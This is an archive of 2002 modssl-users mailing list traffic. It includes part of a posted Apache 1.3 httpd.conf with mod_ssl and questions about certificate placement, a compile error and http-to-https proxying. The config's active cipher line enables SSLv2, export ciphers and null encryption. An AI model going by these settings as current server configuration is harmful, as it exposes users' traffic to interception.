LoadModule imap_module        libexec/mod_imap.so
LoadModule action_module      libexec/mod_actions.so
LoadModule speling_module     libexec/mod_speling.so
LoadModule userdir_module     libexec/mod_userdir.so
LoadModule alias_module       libexec/mod_alias.so
LoadModule rewrite_module     libexec/mod_rewrite.so
LoadModule access_module      libexec/mod_access.so
LoadModule auth_module        libexec/mod_auth.so
LoadModule anon_auth_module   libexec/mod_auth_anon.so
LoadModule dbm_auth_module    libexec/mod_auth_dbm.so
LoadModule digest_module      libexec/mod_digest.so
LoadModule proxy_module       libexec/libproxy.so
LoadModule cern_meta_module   libexec/mod_cern_meta.so
LoadModule expires_module     libexec/mod_expires.so
LoadModule headers_module     libexec/mod_headers.so
LoadModule usertrack_module   libexec/mod_usertrack.so
LoadModule unique_id_module   libexec/mod_unique_id.so
LoadModule setenvif_module    libexec/mod_setenvif.so


LoadModule ssl_module         libexec/libssl.so

LoadModule php4_module        libexec/libphp4.so

ClearModuleList
AddModule mod_vhost_alias.c
AddModule mod_env.c
AddModule mod_define.c
AddModule mod_log_config.c
AddModule mod_mime_magic.c
AddModule mod_mime.c
AddModule mod_negotiation.c
AddModule mod_status.c
AddModule mod_info.c
AddModule mod_include.c
AddModule mod_autoindex.c
AddModule mod_dir.c
AddModule mod_cgi.c
AddModule mod_asis.c
AddModule mod_imap.c
AddModule mod_actions.c
AddModule mod_speling.c
AddModule mod_userdir.c
AddModule mod_alias.c
AddModule mod_rewrite.c
AddModule mod_access.c
AddModule mod_auth.c
AddModule mod_auth_anon.c
AddModule mod_auth_dbm.c
AddModule mod_digest.c
AddModule mod_proxy.c
AddModule mod_cern_meta.c
AddModule mod_expires.c
AddModule mod_headers.c
AddModule mod_usertrack.c
AddModule mod_unique_id.c
AddModule mod_so.c
AddModule mod_setenvif.c

AddModule mod_ssl.c

AddModule mod_php4.c

#ExtendedStatus On

#Port 80


#Listen 80
Listen 443


User nobody
Group nobody

ServerAdmin root@maniac
ServerName xxx.xxx.xxx.xxx

DocumentRoot "/home/httpd/html"


    Options FollowSymLinks
    AllowOverride None



    Options Indexes FollowSymLinks MultiViews
    AllowOverride All
    Order allow,deny
    Allow from all



    UserDir public_html


#
#    AllowOverride FileInfo AuthConfig Limit
#    Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
#    
#        Order allow,deny
#        Allow from all
#    
#    
#        Order deny,allow
#        Deny from all
#    
#


    DirectoryIndex index.html index.htm index.php index.cgi


AccessFileName .htaccess


    Order allow,deny
    Deny from all
#    Satisfy All


#CacheNegotiatedDocs
UseCanonicalName On

    TypesConfig /usr/src/apache/conf/mime.types

DefaultType text/plain


    MIMEMagicFile /usr/src/apache/conf/magic


HostnameLookups Off

ErrorLog /usr/src/apache/logs/error_log
LogLevel warn
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" =
combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
CustomLog /usr/src/apache/logs/access_log common

#CustomLog /usr/src/apache/logs/referer_log referer
#CustomLog /usr/src/apache/logs/agent_log agent

#CustomLog /usr/src/apache/logs/access_log combined

ServerSignature On
# > AddType       text/html .ahtml
# > EBCDICConvert Off=3DInOut .ahtml
#
# EBCDICConvertByType  On=3DInOut text/* message/* multipart/*
# EBCDICConvertByType  On=3DIn    application/x-www-form-urlencoded
# EBCDICConvertByType  On=3DInOut application/postscript model/vrml
# EBCDICConvertByType Off=3DInOut */*



       Alias /icons/ "/home/httpd/icons/"

    
	IdentityCheck on
	AuthType basic
	AuthUserFile /home/httpd/cgi-bin/.htpasswd
	AuthName home
        Options Indexes MultiViews
        AllowOverride None
        Order allow,deny
        Allow from all
    

      Alias /manual/ "/usr/src/apache/htdocs/manual/"

    
        Options Indexes FollowSymlinks MultiViews
        AllowOverride None
        Order allow,deny
        Allow from all
    

 =20
    ScriptAlias /cgi-bin/ "/home/httpd/cgi-bin/"

     
	IdentityCheck on
	AuthType basic
	AuthUserFile /home/httpd/cgi-bin/.htpasswd
	AuthName home
        AllowOverride None
        Options None
        Order allow,deny
        Allow from all
    


# End of aliases.



      IndexOptions FancyIndexing

    AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip
    AddIconByType (TXT,/icons/text.gif) text/*
    AddIconByType (IMG,/icons/image2.gif) image/*
    AddIconByType (SND,/icons/sound2.gif) audio/*
    AddIconByType (VID,/icons/movie.gif) video/*

    AddIcon /icons/binary.gif .bin .exe
    AddIcon /icons/binhex.gif .hqx
    AddIcon /icons/tar.gif .tar
    AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv
    AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip
    AddIcon /icons/a.gif .ps .ai .eps
    AddIcon /icons/layout.gif .html .shtml .htm .pdf
    AddIcon /icons/text.gif .txt
    AddIcon /icons/c.gif .c
    AddIcon /icons/p.gif .pl .py
    AddIcon /icons/f.gif .for
    AddIcon /icons/dvi.gif .dvi
    AddIcon /icons/uuencoded.gif .uu
    AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl
    AddIcon /icons/tex.gif .tex
    AddIcon /icons/bomb.gif core

    AddIcon /icons/back.gif ..
    AddIcon /icons/hand.right.gif README
    AddIcon /icons/folder.gif ^^DIRECTORY^^
    AddIcon /icons/blank.gif ^^BLANKICON^^

  =20
    DefaultIcon /icons/unknown.gif

    AddDescription "GZIP compressed document" .gz
    AddDescription "tar archive" .tar
    AddDescription "GZIP compressed tar archive" .tgz

    ReadmeName README
    HeaderName HEADER

    IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t




 =20
    AddEncoding x-compress Z
    AddEncoding x-gzip gz tgz

    AddLanguage da .dk
    AddLanguage nl .nl
    AddLanguage en .en
    AddLanguage et .ee
    AddLanguage fr .fr
    AddLanguage de .de
    AddLanguage el .el
    AddLanguage he .he
    AddCharset ISO-8859-8 .iso8859-8
    AddLanguage it .it
    AddLanguage ja .ja
    AddCharset ISO-2022-JP .jis
    AddLanguage kr .kr
    AddCharset ISO-2022-KR .iso-kr
    AddLanguage nn .nn
    AddLanguage no .no
    AddLanguage pl .po
    AddCharset ISO-8859-2 .iso-pl
    AddLanguage pt .pt
    AddLanguage pt-br .pt-br
    AddLanguage ltz .lu
    AddLanguage ca .ca
    AddLanguage es .es
    AddLanguage sv .sv
    AddLanguage cz .cz
    AddLanguage ru .ru
    AddLanguage zh-tw .tw
    AddLanguage tw .tw
    AddCharset Big5         .Big5    .big5
    AddCharset WINDOWS-1251 .cp-1251
    AddCharset CP866        .cp866
    AddCharset ISO-8859-5   .iso-ru
    AddCharset KOI8-R       .koi8-r
    AddCharset UCS-2        .ucs2
    AddCharset UCS-4        .ucs4
    AddCharset UTF-8        .utf8

   =20
    
        LanguagePriority en da nl et fr de el it ja kr no pl pt pt-br ru =
ltz ca es sv tw
    

   =20
    AddType application/x-tar .tgz
    AddType application/x-httpd-php .php
   =20
    AddHandler cgi-script .cgi

    AddType text/html .shtml
    AddHandler server-parsed .shtml

    AddHandler send-as-is asis

    AddHandler imap-file map

    AddHandler type-map var


#MetaDir .web

#MetaSuffix .meta



  =20
    BrowserMatch "Mozilla/2" nokeepalive
    BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 =
force-response-1.0

   =20
    BrowserMatch "RealPlayer 4\.0" force-response-1.0
    BrowserMatch "Java/1\.0" force-response-1.0
    BrowserMatch "JDK/1\.0" force-response-1.0



#
#    SetHandler server-status
#    Order deny,allow
#    Deny from all
#    Allow from .your-domain.com
#

#
#    SetHandler server-info
#    Order deny,allow
#    Deny from all
#    Allow from .your-domain.com
#

#
#    Deny from all
#    ErrorDocument 403 http://phf.apache.org/phf_abuse_log.cgi
#

#
#    ProxyRequests On

#    
#        Order deny,allow
#        Deny from all
#        Allow from .your-domain.com
#    

=20
#    ProxyVia On

#    CacheRoot "/usr/src/apache/proxy"
#    CacheSize 5
#    CacheGcInterval 4
#    CacheMaxExpire 24
#    CacheLastModifiedFactor 0.1
#    CacheDefaultExpire 1
#    NoCache a-domain.com another-domain.edu joes.garage-sale.com

#

#NameVirtualHost *

#
#    ServerAdmin webmaster@dummy-host.example.com
#    DocumentRoot /www/docs/dummy-host.example.com
#    ServerName dummy-host.example.com
#    ErrorLog logs/dummy-host.example.com-error_log
#    CustomLog logs/dummy-host.example.com-access_log common
#

#
#


AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl




SSLPassPhraseDialog  builtin

#SSLSessionCache        none
#SSLSessionCache        shmht:/usr/src/apache/logs/ssl_scache(512000)
#SSLSessionCache        shmcb:/usr/src/apache/logs/ssl_scache(512000)
SSLSessionCache         dbm:/usr/src/apache/logs/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  file:/usr/src/apache/logs/ssl_mutex

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/dev/random  512
#SSLRandomSeed startup file:/dev/urandom 512
#SSLRandomSeed connect file:/dev/random  512
#SSLRandomSeed connect file:/dev/urandom 512

SSLLog /usr/src/apache/logs/ssl_engine_log
SSLLogLevel info





##
## SSL Virtual Host Context
##



DocumentRoot "/home/httpd/html"
ServerName xxx.xxx.xxx.xxx
ServerAdmin root@maniac
ErrorLog /usr/src/apache/logs/error_log
TransferLog /usr/src/apache/logs/access_log

SSLEngine on

SSLCipherSuite =
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile /usr/src/apache/conf/ssl.crt/server.crt
#SSLCertificateFile /usr/src/apache/conf/ssl.crt/server-dsa.crt

SSLCertificateKeyFile /usr/src/apache/conf/ssl.key/server.key
#SSLCertificateKeyFile /usr/src/apache/conf/ssl.key/server-dsa.key

#SSLCertificateChainFile /usr/src/apache/conf/ssl.crt/ca.crt

#SSLCACertificatePath /usr/src/apache/conf/ssl.crt
#SSLCACertificateFile /usr/src/apache/conf/ssl.crt/ca-bundle.crt

#SSLCARevocationPath /usr/src/apache/conf/ssl.crl
#SSLCARevocationFile /usr/src/apache/conf/ssl.crl/ca-bundle.crl

#SSLVerifyClient require
#SSLVerifyDepth  10

#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >=3D 1 and %{TIME_WDAY} <=3D 5 \
#            and %{TIME_HOUR} >=3D 8 and %{TIME_HOUR} <=3D 20       ) \
#           or %{REMOTE_ADDR} =3D~ m/^192\.76\.162\.[0-9]+$/
#

#   SSL Engine Options:
#   Set various options for the SSL engine.
#   o FakeBasicAuth:
#     Translate the client X.509 into a Basic Authorisation.  This means =
that
#     the standard Auth/DBMAuth methods can be used for access control.  =
The
#     user name is the `one line' version of the client's X.509 =
certificate.
#     Note that no password is obtained from the user. Every entry in =
the user
#     file needs this password: `xxj31ZMTZzkVA'.
#   o ExportCertData:
#     This exports two additional environment variables: SSL_CLIENT_CERT =
and
#     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
#     server (always existing) and the client (only existing when client
#     authentication is used). This can be used to import the =
certificates
#     into CGI scripts.
#   o StdEnvVars:
#     This exports the standard SSL/TLS related `SSL_*' environment =
variables.
#     Per default this exportation is switched off for performance =
reasons,
#     because the extraction step is an expensive operation and is =
usually
#     useless for serving static content. So one usually enables the
#     exportation for CGI and SSI requests only.
#   o CompatEnvVars:
#     This exports obsolete environment variables for backward =
compatibility
#     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. =
Use this
#     to provide compatibility to existing CGI scripts.
#   o StrictRequire:
#     This denies access when "SSLRequireSSL" or "SSLRequire" applied =
even
#     under a "Satisfy any" situation, i.e. when it applies access is =
denied
#     and no other module can change it.
#   o OptRenegotiate:
#     This enables optimized SSL connection renegotiation handling when =
SSL
#     directives are used in per-directory context.=20
#SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


#   SSL Protocol Adjustments:
#   The safe and default but still SSL/TLS standard compliant shutdown
#   approach is that mod_ssl sends the close notify alert but doesn't =
wait for
#   the close notify alert from client. When you need a different =
shutdown
#   approach you can use one of the following variables:
#   o ssl-unclean-shutdown:
#     This forces an unclean shutdown when the connection is closed, =
i.e. no
#     SSL close notify alert is send or allowed to received.  This =
violates
#     the SSL/TLS standard but is needed for some brain-dead browsers. =
Use
#     this when you receive I/O errors because of the standard approach =
where
#     mod_ssl sends the close notify alert.
#   o ssl-accurate-shutdown:
#     This forces an accurate shutdown when the connection is closed, =
i.e. a
#     SSL close notify alert is send and mod_ssl waits for the close =
notify
#     alert of the client. This is 100% SSL/TLS standard compliant, but =
in
#     practice often causes hanging connections with brain-dead =
browsers. Use
#     this only for browsers where you know that their SSL =
implementation
#     works correctly.=20
#   Notice: Most problems of broken clients are also related to the HTTP
#   keep-alive facility, so you usually additionally want to disable
#   keep-alive for those clients, too. Use variable "nokeepalive" for =
this.
#   Similarly, one has to force some clients to use HTTP/1.0 to =
workaround
#   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" =
and
#   "force-response-1.0" for this.
SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

CustomLog /usr/src/apache/logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"

                                 =20




------=_NextPart_000_0044_01C2325F.DE2CB8F0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 23 16:01:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA05228; Tue, 23 Jul 2002 16:00:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mm02snlnto.sandia.gov id PAA05151; Tue, 23 Jul 2002 15:59:46 +0200 (MET DST)
Received: from 132.175.109.4 by mm02snlnto.sandia.gov with ESMTP (
 Tumbleweed MMS SMTP Relay (MMS v4.7)); Tue, 23 Jul 2002 07:56:30 -0600
X-Server-Uuid: 95b8ca9b-fe4b-44f7-8977-a6cb2d3025ff
Received: from es08snlnt.sandia.gov (es08snlnt.sandia.gov
 [134.253.130.11]) by mailgate2.sandia.gov (8.12.3/8.12.3) with ESMTP id
 g6NDxW2B024314 for ; Tue, 23 Jul 2002 07:59:32
 -0600 (MDT)
Received: by es08snlnt.sandia.gov with Internet Mail Service (
 5.5.2653.19) id ; Tue, 23 Jul 2002 07:59:31 -0600
Message-ID: 
From: "Ashmore, Samuel R" 
To: "'modssl-users@modssl.org'" 
Subject: RE: RH 7.3 and SSL
Date: Tue, 23 Jul 2002 07:59:31 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-Filter-Version: 1.8 (sass2426)
X-WSS-ID: 1123BF043074765-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ashmore, Samuel R" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

If you are running Apache2 then in the ssl.conf there are directives taht
say SSLCertificateFile, SSLCertificateKeyFile, SSLCACertificateFile change
these.
If you are running Apache1.3 then in the httpd.conf there are the same
directives.  
These should point to your certificate, key and the cacert

-----Original Message-----
From: David F. Reed [mailto:davereed@w5sv.org]
Sent: Monday, July 22, 2002 6:48 PM
To: valhalla-list@redhat.com; modssl-users@modssl.org
Subject: RH 7.3 and SSL


Pardon my ignorance and cross posting in hopes of finding the
answer.

I am running RH linux 7.3 (upgraded rom 6.2).

I am trying to get imaps and https working with my certificates;
I think the programs themselves are working, because they present
a funky "localhost@localdomain" certificate.

I seem unable to figure out where to put the certificates I generated
(in /usr/share/ssl/certs).

I did stop and restart the httpd service.

Any clues?


Many thanks.

--Dave

-- 
David F. Reed  -> email: davidf.reed@amd.com (w)  W5SV@arrl.net (h)
(for pgp key: davereed@W5SV.org http://keys.pgp.com/ )
 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 23 17:08:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA10150; Tue, 23 Jul 2002 17:07:48 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP
	from psa-relay6.mpsa.com id RAA10059; Tue, 23 Jul 2002 17:06:30 +0200 (MET DST)
From: abdel.ramli@mpsa.com
Received: from aigti2.domino.inetpsa.com ([192.168.2.31]) by
          psa-relay6.mpsa.com (Netscape Messaging Server 4.15) with ESMTP
          id GZPJBZ00.XAL; Tue, 23 Jul 2002 17:07:11 +0200 
Subject: Problem with ssl
X-Mailer: Lotus Notes Release 5.0.8  June 18, 2001
Message-ID: 
Date: Tue, 23 Jul 2002 17:06:12 +0200
To: modssl-users@modssl.org
Cc: owner-modssl-users@modssl.org
X-MIMETrack: Serialize by Router on AIGTI2.DOMINO/S/PSA(Release 5.0.8 |June 18, 2001) at
 23/07/2002 05:06:22 PM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: abdel.ramli@mpsa.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


*Hi all

I'm trying to get mod_ssl work with Apache on RedHat 7.2, with Apache
1.3.26 & mod_ssl-2.8.10-1.3.26


I just keep getting an error on line 76 of the mod_ssl.c while compiling
apache (patched with mod_ssl)

which is :

--------------------------------------------------------------------------------------------------
 *  identify the module to SCCS `what' and RCS `ident' commands
 */
static char const sccsid[] = "@(#) mod_ssl/" MOD_SSL_VERSION " >";
static char const rcsid[]  = "$Id: mod_ssl/" MOD_SSL_VERSION " $";
--------------------------------------------------------------------------------------------------

Just followed many procedures and the error remain the same.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 24 09:19:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA27045; Wed, 24 Jul 2002 09:18:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from psa-relay6.mpsa.com id JAA27017; Wed, 24 Jul 2002 09:17:29 +0200 (MET DST)
From: abdel.ramli@mpsa.com
Received: from aigti2.domino.inetpsa.com ([192.168.2.31]) by
          psa-relay6.mpsa.com (Netscape Messaging Server 4.15) with ESMTP
          id GZQSA800.A9Q for ; Wed, 24 Jul 2002
          09:18:08 +0200 
Subject: =?iso-8859-1?Q?R=E9f=2E_=3A_RE=3A_Problem_with_ssl?=
X-Mailer: Lotus Notes Release 5.0.8  June 18, 2001
Message-ID: 
Date: Wed, 24 Jul 2002 09:17:18 +0200
To: "Frederic DONNAT" 
X-MIMETrack: Serialize by Router on AIGTI2.DOMINO/S/PSA(Release 5.0.8 |June 18, 2001) at
 24/07/2002 09:17:22 AM
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA27036
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: abdel.ramli@mpsa.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi Fred,
That's exactly what I meant by patched (as we may consider that mod_ssl is
not more than a patch applied to Apache source to modify it.

I just keep getting that error.
Please, help if you can.

Thanx





                                                                                                                       
                    "Frederic DONNAT"                                                                                  
                                                                
                    encod.com>               cc :                                                                      
                                             Objet : RE: Problem with ssl                                              
                    23/07/2002 18:45                                                                                   
                                                                                                                       
                                                                                                                       






Hi Abdel


What do you mean by "patched"?

The classic way is :
[root]# cd mod_ssl-2.8.10-1.3.26
[root]# ./configure --prefix=/path_where_to_install_apache \
--with-apache=/path_to_apache_src --with-ssl=/path_to_openssl_src
[root]# cd /path_to_apache_src
[root]# make
[root]# make install

That's for a dynamic build.

Type the following command line before for a static one:
export LDFLAGS="-ldl"

Be sure to have the rigth openssl installed.

Hope it will help
Fred

-----Original Message-----
From:   abdel.ramli@mpsa.com [mailto:abdel.ramli@mpsa.com]
Sent:   Tue 07/23/2002 5:06 PM
To:     modssl-users@modssl.org
Cc:     owner-modssl-users@modssl.org
Subject:        Problem with ssl


*Hi all

I'm trying to get mod_ssl work with Apache on RedHat 7.2, with Apache
1.3.26 & mod_ssl-2.8.10-1.3.26


I just keep getting an error on line 76 of the mod_ssl.c while compiling
apache (patched with mod_ssl)

which is :

--------------------------------------------------------------------------------------------------
 *  identify the module to SCCS `what' and RCS `ident' commands
 */
static char const sccsid[] = "@(#) mod_ssl/" MOD_SSL_VERSION " >";
static char const rcsid[]  = "$Id: mod_ssl/" MOD_SSL_VERSION " $";
--------------------------------------------------------------------------------------------------

Just followed many procedures and the error remain the same.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org








______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 24 21:09:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA27020; Wed, 24 Jul 2002 21:08:02 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from uxe450b.kwe.com id VAA26938; Wed, 24 Jul 2002 21:07:02 +0200 (MET DST)
Received: from diungerich ([10.0.2.83]) by uxe450b.kwe.com
          (Netscape Messaging Server 3.6)  with SMTP id AAA11CE
          for ; Wed, 24 Jul 2002 19:05:46 +0000
From: "David Iungerich" 
To: 
Subject: http to https forward
Date: Wed, 24 Jul 2002 14:06:43 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 1 (Highest)
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: High
In-Reply-To: <200207231927.02843.alin.selea@kwe.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Iungerich" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I need to implement Apache as an https to http forwarder.  I belive I need
to use
ProxyPass or Redirect, but am having difficulty figuring out the correct
configuration.
My scenario is as follows:

I have an appserver that needs to POST http requests to another company's
appserver.  Unfortunately, the particular product we are using has issues
being able to send https, and the other company requires it.  They have
issued us certificates to talk to them.  I need to be able to send http POST
reqests to an Apache webserver, have it encrypt the request with the other
company's cert, and then pass the POST onto that company's server via https.
No browser involved.  Eventually, I will need to do the same thing in
reverse, but initially I just need to be able to send in this direction.
Can you tell me what all specific entries needed in the conf file to
implement
this.  Again, our server http to Apache, then encrypt using cert we were
given, and Apache to other
company's server via https.

Apache Vesion is currently 1.3.23 - will update for security issues once we
can implement this scenario.
Running on Suse Linux 8.0

Thanks,
David

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 24 22:47:41 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA04272; Wed, 24 Jul 2002 22:25:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from blueyonder.co.uk id WAA04175; Wed, 24 Jul 2002 22:24:00 +0200 (MET DST)
Received: from pcow057o.blueyonder.co.uk ([127.0.0.1]) by blueyonder.co.uk  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Wed, 24 Jul 2002 21:23:54 +0100
Received: from carlos.wd21.co.uk (unverified [80.195.5.12]) by pcow057o.blueyonder.co.uk
 (Content Technologies SMTPRS 4.2.9) with ESMTP id  for ;
 Wed, 24 Jul 2002 21:23:42 +0100
Received: from www-data by carlos.wd21.co.uk with local (Exim 3.35 #1 (Debian))
	id 17XSl3-00040m-00
	for ; Wed, 24 Jul 2002 21:29:17 +0100
To: modssl-users@modssl.org
Subject: Re: http to https forward
Message-ID: <1027542557.3d3f0e1dadce1@wd21.dyndns.org>
Date: Wed, 24 Jul 2002 21:29:17 +0100 (BST)
From: Michael Pacey 
References: 
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
User-Agent: IMP/PHP IMAP webmail program 2.2.6
X-Originating-IP: 192.168.0.11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Pacey 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Quoting David Iungerich :

> I need to implement Apache as an https to http forwarder.  I belive I
> need
> to use
> ProxyPass or Redirect, but am having difficulty figuring out the
> correct
> configuration.


Just to clarify, I think you mean http to https forwarder, as in your subject;
Apache forwards https to http without any problems.

But for http to https, your problem isn't configuration; Apache+mod_ssl doesn't
have the code for initiation of HTTPS connections. I've looked!

Everybody told me it wouldn't work, I didn't believe them, I couldn't make it
work, I read the code, it's not there!

The only product I know of that might be able to do this is IBM EdgeServer, and
possibly Netscape. Have to say I don't like EdgeServer and I have no experience
of Netscape.

Is there no-one around who'd like to code this? There are quite a few people who
want to use Apache to initiate HTTPS connections. I don't have the time / coding
skills.
--
Web: http://sydb.dyndns.org
ICQ: 152392113 (New to ICQ? http://www.mirabilis.com)
IRC: #sydb on EFnet (New to IRC? http://www.irchelp.org)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 24 23:17:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA07529; Wed, 24 Jul 2002 22:54:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from uxe450b.kwe.com id WAA07382; Wed, 24 Jul 2002 22:53:11 +0200 (MET DST)
Received: from diungerich ([10.0.2.83]) by uxe450b.kwe.com
          (Netscape Messaging Server 3.6)  with SMTP id AAA3D2
          for ; Wed, 24 Jul 2002 20:51:55 +0000
From: "David Iungerich" 
To: 
Subject: RE: http to https forward
Date: Wed, 24 Jul 2002 15:52:51 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
In-Reply-To: <1027542557.3d3f0e1dadce1@wd21.dyndns.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Iungerich" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

yes, that is correct.  I meant http to https.  So, there is no way to do
this with existing mods?  I have to use something else?  Java or Python
program?  Anyone already have anything?

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Michael Pacey
Sent: Wednesday, July 24, 2002 3:29 PM
To: modssl-users@modssl.org
Subject: Re: http to https forward


Quoting David Iungerich :

> I need to implement Apache as an https to http forwarder.  I belive I
> need
> to use
> ProxyPass or Redirect, but am having difficulty figuring out the
> correct
> configuration.


Just to clarify, I think you mean http to https forwarder, as in your
subject;
Apache forwards https to http without any problems.

But for http to https, your problem isn't configuration; Apache+mod_ssl
doesn't
have the code for initiation of HTTPS connections. I've looked!

Everybody told me it wouldn't work, I didn't believe them, I couldn't make
it
work, I read the code, it's not there!

The only product I know of that might be able to do this is IBM EdgeServer,
and
possibly Netscape. Have to say I don't like EdgeServer and I have no
experience
of Netscape.

Is there no-one around who'd like to code this? There are quite a few people
who
want to use Apache to initiate HTTPS connections. I don't have the time /
coding
skills.
--
Web: http://sydb.dyndns.org
ICQ: 152392113 (New to ICQ? http://www.mirabilis.com)
IRC: #sydb on EFnet (New to IRC? http://www.irchelp.org)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 25 00:32:32 2002
